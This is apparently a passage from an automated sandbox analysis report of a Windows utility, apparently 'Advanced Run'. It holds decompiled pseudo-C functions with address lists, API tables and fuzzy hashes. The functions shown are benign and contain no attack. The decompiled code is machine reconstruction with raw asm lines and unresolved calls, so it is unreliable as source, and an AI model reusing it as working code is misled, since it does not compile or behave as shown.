                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memcpymemsetwcslen$HandleModulewcscpy$FileLoadNameSaveString_snwprintf
                                                                                                                • String ID: L$cfg
                                                                                                                • API String ID: 275899518-3734058911
                                                                                                                • Opcode ID: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction ID: 069f946bae6f7cb0c9846f37a0b0d91fba0b14879ba0d1f27e167351657a8a18
                                                                                                                • Opcode Fuzzy Hash: 82f9c32c0c79633b068e26f34505a517ae9d13a5a1787d7b2c1c5d310a57e8a8
                                                                                                                • Instruction Fuzzy Hash: 78312AB1D04218AFDB50DFA5D889ADEBBB8FF04314F10416AE508B6280DB746A85CF99
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404ED0, Relevance: 10.6, APIs: 7, Instructions: 63timeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00404ED0(FILETIME* __eax, wchar_t* _a4) {
				struct _SYSTEMTIME _v20;
				long _v276;
				long _v532;
				FILETIME* _t15;

				_t15 = __eax;
				if(__eax->dwHighDateTime != 0 ||  *__eax != 0) {
					if(FileTimeToSystemTime(_t15,  &_v20) == 0 || _v20 <= 0x3e8) {
						goto L5;
					} else {
						GetDateFormatW(0x400, 1,  &_v20, 0,  &_v276, 0x80);
						GetTimeFormatW(0x400, 0,  &_v20, 0,  &_v532, 0x80);
						wcscpy(_a4,  &_v276);
						wcscat(_a4, " ");
						wcscat(_a4,  &_v532);
					}
				} else {
					L5:
					wcscpy(_a4, 0x40c4e8);
				}
				return _a4;
			}







                                                                                                                0x00404ed0
                                                                                                                0x00404edf
                                                                                                                0x00404ef6
                                                                                                                0x00000000
                                                                                                                0x00404f00
                                                                                                                0x00404f1c
                                                                                                                0x00404f31
                                                                                                                0x00404f41
                                                                                                                0x00404f4e
                                                                                                                0x00404f5d
                                                                                                                0x00404f66
                                                                                                                0x00404f69
                                                                                                                0x00404f69
                                                                                                                0x00404f71
                                                                                                                0x00404f77
                                                                                                                0x00404f7d

                                                                                                                APIs
                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 00404EEE
                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F1C
                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000003E8,00000000,?,00000080,?,?,?,?), ref: 00404F31
                                                                                                                • wcscpy.MSVCRT ref: 00404F41
                                                                                                                • wcscat.MSVCRT ref: 00404F4E
                                                                                                                • wcscat.MSVCRT ref: 00404F5D
                                                                                                                • wcscpy.MSVCRT ref: 00404F71
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                • String ID:
                                                                                                                • API String ID: 1331804452-0
                                                                                                                • Opcode ID: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction ID: 27f756489727a3478797c508db698983d473b6c4fef27ef98cb5a9ae0a7a07e8
                                                                                                                • Opcode Fuzzy Hash: bcd4d34c10f2eb1284b4297ba1ca8defa1a10ff7f0e8a8f4937edf2a6ab2f069
                                                                                                                • Instruction Fuzzy Hash: 951160B2840119EBDB11AB94DC85EFE776CFB44304F04457ABA05B6090D774AA858BA8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00404FE0, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 71%
                                                                                                                			E00404FE0(wchar_t* __edi, intOrPtr _a4, signed int _a8) {
				void _v514;
				long _v516;
				wchar_t* _t34;
				signed int _t35;
				void* _t36;
				void* _t37;

				_t34 = __edi;
				_v516 = _v516 & 0x00000000;
				memset( &_v514, 0, 0x1fc);
				 *__edi =  *__edi & 0x00000000;
				_t37 = _t36 + 0xc;
				_t35 = 0;
				do {
					_push( *(_t35 + _a4) & 0x000000ff);
					_push(L"%2.2X");
					_push(0xff);
					_push( &_v516);
					L0040B1EC();
					_t37 = _t37 + 0x10;
					if(_t35 > 0) {
						wcscat(_t34, " ");
					}
					if(_a8 > 0) {
						asm("cdq");
						if(_t35 % _a8 == 0) {
							wcscat(_t34, L"  ");
						}
					}
					wcscat(_t34,  &_v516);
					_t35 = _t35 + 1;
				} while (_t35 < 0x80);
				return _t34;
			}









                                                                                                                0x00404fe0
                                                                                                                0x00404fe9
                                                                                                                0x00405000
                                                                                                                0x00405005
                                                                                                                0x00405009
                                                                                                                0x0040500c
                                                                                                                0x0040500e
                                                                                                                0x00405015
                                                                                                                0x00405016
                                                                                                                0x00405021
                                                                                                                0x00405026
                                                                                                                0x00405027
                                                                                                                0x0040502c
                                                                                                                0x00405031
                                                                                                                0x00405039
                                                                                                                0x0040503f
                                                                                                                0x00405044
                                                                                                                0x00405048
                                                                                                                0x0040504e
                                                                                                                0x00405056
                                                                                                                0x0040505c
                                                                                                                0x0040504e
                                                                                                                0x00405065
                                                                                                                0x0040506a
                                                                                                                0x00405072
                                                                                                                0x00405079

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$_snwprintfmemset
                                                                                                                • String ID: %2.2X
                                                                                                                • API String ID: 2521778956-791839006
                                                                                                                • Opcode ID: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction ID: 93e5f8641594d75a0278127c9762c797554eaad4f41234795e116b90c7bd1a0f
                                                                                                                • Opcode Fuzzy Hash: 34c89676a934ea4f3d268c8f85442ed9bc59df14bbff203197c18b8f91f69b12
                                                                                                                • Instruction Fuzzy Hash: FA01B57394072566E72067569C86BBB33ACEB41714F10407BFD14B91C2EB7CDA444ADC
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00407D80, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 54COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 42%
                                                                                                                			E00407D80(intOrPtr* __ecx, intOrPtr _a4) {
				void _v514;
				char _v516;
				void _v1026;
				char _v1028;
				void* __esi;
				intOrPtr* _t16;
				void* _t19;
				intOrPtr* _t29;
				char* _t31;

				_t29 = __ecx;
				_v516 = 0;
				memset( &_v514, 0, 0x1fc);
				_v1028 = 0;
				memset( &_v1026, 0, 0x1fc);
				_t16 = _t29;
				if( *((intOrPtr*)(_t29 + 0x24)) == 0) {
					_push(L"<?xml version=\"1.0\" encoding=\"ISO-8859-1\" ?>\r\n");
				} else {
					_push(L"<?xml version=\"1.0\" ?>\r\n");
				}
				E00407343(_t16);
				_t19 =  *((intOrPtr*)( *_t29 + 0x24))(_a4);
				_t31 =  &_v516;
				E00407250(_t31, _t19);
				_push(_t31);
				_push(L"<%s>\r\n");
				_push(0xff);
				_push( &_v1028);
				L0040B1EC();
				return E00407343(_t29, _a4,  &_v1028);
			}












                                                                                                                0x00407d9c
                                                                                                                0x00407d9e
                                                                                                                0x00407da5
                                                                                                                0x00407db3
                                                                                                                0x00407dba
                                                                                                                0x00407dc5
                                                                                                                0x00407dc7
                                                                                                                0x00407dd0
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dc9
                                                                                                                0x00407dd8
                                                                                                                0x00407de1
                                                                                                                0x00407de5
                                                                                                                0x00407deb
                                                                                                                0x00407df2
                                                                                                                0x00407df3
                                                                                                                0x00407dfe
                                                                                                                0x00407e03
                                                                                                                0x00407e04
                                                                                                                0x00407e21

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • <?xml version="1.0" ?>, xrefs: 00407DC9
                                                                                                                • <%s>, xrefs: 00407DF3
                                                                                                                • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf
                                                                                                                • String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
                                                                                                                • API String ID: 3473751417-2880344631
                                                                                                                • Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
                                                                                                                • Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
                                                                                                                • Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 70%
                                                                                                                			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}









                                                                                                                0x00403b56
                                                                                                                0x00403b5d
                                                                                                                0x00403b6f
                                                                                                                0x00403b76
                                                                                                                0x00403b82
                                                                                                                0x00403b8d
                                                                                                                0x00403b8e
                                                                                                                0x00403b99
                                                                                                                0x00403b9e
                                                                                                                0x00403b9f
                                                                                                                0x00403ba7
                                                                                                                0x00403bb9
                                                                                                                0x00403bce
                                                                                                                0x00403be5
                                                                                                                0x00403bef
                                                                                                                0x00403bf8
                                                                                                                0x00403c00

                                                                                                                APIs
                                                                                                                • memset.MSVCRT ref: 00403B5D
                                                                                                                • memset.MSVCRT ref: 00403B76
                                                                                                                  • Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4
                                                                                                                • _snwprintf.MSVCRT ref: 00403B9F
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
                                                                                                                  • Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
                                                                                                                  • Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
                                                                                                                  • Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
                                                                                                                • String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
                                                                                                                • API String ID: 1832587304-479876776
                                                                                                                • Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
                                                                                                                • Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
                                                                                                                • Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}








                                                                                                                0x0040afd3
                                                                                                                0x0040afe2
                                                                                                                0x0040aff3
                                                                                                                0x0040b002
                                                                                                                0x0040b023
                                                                                                                0x00000000
                                                                                                                0x0040b047
                                                                                                                0x0040b02e
                                                                                                                0x0040b034
                                                                                                                0x0040b03c
                                                                                                                0x00000000

                                                                                                                APIs
                                                                                                                • wcscpy.MSVCRT ref: 0040AFD3
                                                                                                                • wcscat.MSVCRT ref: 0040AFE2
                                                                                                                • wcscat.MSVCRT ref: 0040AFF3
                                                                                                                • wcscat.MSVCRT ref: 0040B002
                                                                                                                • VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C
                                                                                                                  • Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
                                                                                                                  • Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940
                                                                                                                  • Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
                                                                                                                  • Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
                                                                                                                • String ID: \StringFileInfo\
                                                                                                                • API String ID: 393120378-2245444037
                                                                                                                • Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
                                                                                                                • Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
                                                                                                                • Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: _snwprintfwcscpy
                                                                                                                • String ID: dialog_%d$general$menu_%d$strings
                                                                                                                • API String ID: 999028693-502967061
                                                                                                                • Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
                                                                                                                • Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
                                                                                                                • Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 35%
                                                                                                                			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0 ||  *0x4101bc == 0) {
					if( *0x4101b8 != _t98) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(_t59 != 0) {
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								if(E00409510(_a8,  &_a8) != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t72 = OpenProcess(0x410, 0, _a4);
					_v0 = _t72;
					if(_t72 != 0) {
						_push( &_a4);
						_push(0x8000);
						_push( &_a2160);
						_push(_t72);
						if( *0x40f840() != 0) {
							_t6 =  &_v12;
							 *_t6 = _v12 >> 2;
							_v8 = 1;
							_t90 = 0;
							if( *_t6 != 0) {
								while(1) {
									_a1616 = _t98;
									memset( &_a1618, _t98, 0x208);
									memset( &_a8, _t98, 0x21c);
									_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
									_t106 = _t106 + 0x18;
									_a8 = _a4;
									_a12 = _t78;
									 *0x40f838(_v16, _t78,  &_a1616, 0x104);
									E0040920A( &_v0,  &_a1600);
									_push(0xc);
									_push( &_v20);
									_push(_v4);
									_push(_v32);
									if( *0x40f844() != 0) {
										_a508 = _v32;
										_a512 = _v36;
									}
									if(E00409510(_a8,  &_v24) == 0) {
										goto L18;
									}
									_t90 = _t90 + 1;
									if(_t90 < _v44) {
										_t98 = 0;
										continue;
									} else {
									}
									goto L18;
								}
							}
						}
						L18:
						CloseHandle(_v16);
					}
				}
				return _a8;
			}
























                                                                                                                0x004092f3
                                                                                                                0x004092fb
                                                                                                                0x00409303
                                                                                                                0x00409305
                                                                                                                0x00409310
                                                                                                                0x00409439
                                                                                                                0x0040943f
                                                                                                                0x00409445
                                                                                                                0x0040944e
                                                                                                                0x00409452
                                                                                                                0x00409466
                                                                                                                0x0040946e
                                                                                                                0x00409475
                                                                                                                0x004094f7
                                                                                                                0x00409488
                                                                                                                0x00409494
                                                                                                                0x004094a5
                                                                                                                0x004094a9
                                                                                                                0x004094b5
                                                                                                                0x004094c3
                                                                                                                0x004094c6
                                                                                                                0x004094d5
                                                                                                                0x004094e3
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094f1
                                                                                                                0x00000000
                                                                                                                0x004094e3
                                                                                                                0x00000000
                                                                                                                0x004094f7
                                                                                                                0x00409452
                                                                                                                0x00409322
                                                                                                                0x0040932b
                                                                                                                0x00409333
                                                                                                                0x00409337
                                                                                                                0x00409341
                                                                                                                0x00409342
                                                                                                                0x0040934e
                                                                                                                0x0040934f
                                                                                                                0x00409358
                                                                                                                0x0040935e
                                                                                                                0x0040935e
                                                                                                                0x00409363
                                                                                                                0x0040936b
                                                                                                                0x0040936d
                                                                                                                0x00409377
                                                                                                                0x00409385
                                                                                                                0x0040938d
                                                                                                                0x0040939d
                                                                                                                0x004093a5
                                                                                                                0x004093ac
                                                                                                                0x004093b4
                                                                                                                0x004093c5
                                                                                                                0x004093c9
                                                                                                                0x004093da
                                                                                                                0x004093df
                                                                                                                0x004093e5
                                                                                                                0x004093e6
                                                                                                                0x004093ea
                                                                                                                0x004093f6
                                                                                                                0x004093fc
                                                                                                                0x00409407
                                                                                                                0x00409407
                                                                                                                0x0040941d
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00409423
                                                                                                                0x00409428
                                                                                                                0x00409375
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040942e
                                                                                                                0x00000000
                                                                                                                0x00409428
                                                                                                                0x00409377
                                                                                                                0x0040936d
                                                                                                                0x004094fb
                                                                                                                0x004094ff
                                                                                                                0x004094ff
                                                                                                                0x00409337
                                                                                                                0x0040950f

                                                                                                                APIs
                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
                                                                                                                • memset.MSVCRT ref: 0040938D
                                                                                                                • memset.MSVCRT ref: 0040939D
                                                                                                                  • Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233
                                                                                                                • memset.MSVCRT ref: 00409488
                                                                                                                • wcscpy.MSVCRT ref: 004094A9
                                                                                                                • CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 3300951397-0
                                                                                                                • Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
                                                                                                                • Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
                                                                                                                • Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 44%
                                                                                                                			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}





                                                                                                                0x00402ed7
                                                                                                                0x00402eee
                                                                                                                0x00402ef8
                                                                                                                0x00402f00
                                                                                                                0x00402f01
                                                                                                                0x00402f05
                                                                                                                0x00402f0a
                                                                                                                0x00402f1a
                                                                                                                0x00402f30

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.282737839.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.282731404.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282750145.000000000040C000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282758340.000000000040F000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000009.00000002.282765340.000000000041D000.00000002.00020000.sdmp Download File
                                                                                                                Similarity
                                                                                                                • API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
                                                                                                                • String ID:
                                                                                                                • API String ID: 19018683-0
                                                                                                                • Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
                                                                                                                • Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
                                                                                                                • Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 50%
                                                                                                                			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}










                                                                                                                0x004079a4
                                                                                                                0x004079b8
                                                                                                                0x004079bd
                                                                                                                0x004079c2
                                                                                                                0x004079c5
                                                                                                                0x004079c5
                                                                                                                0x004079db
                                                                                                                0x004079f7
                                                                                                                0x00407a06
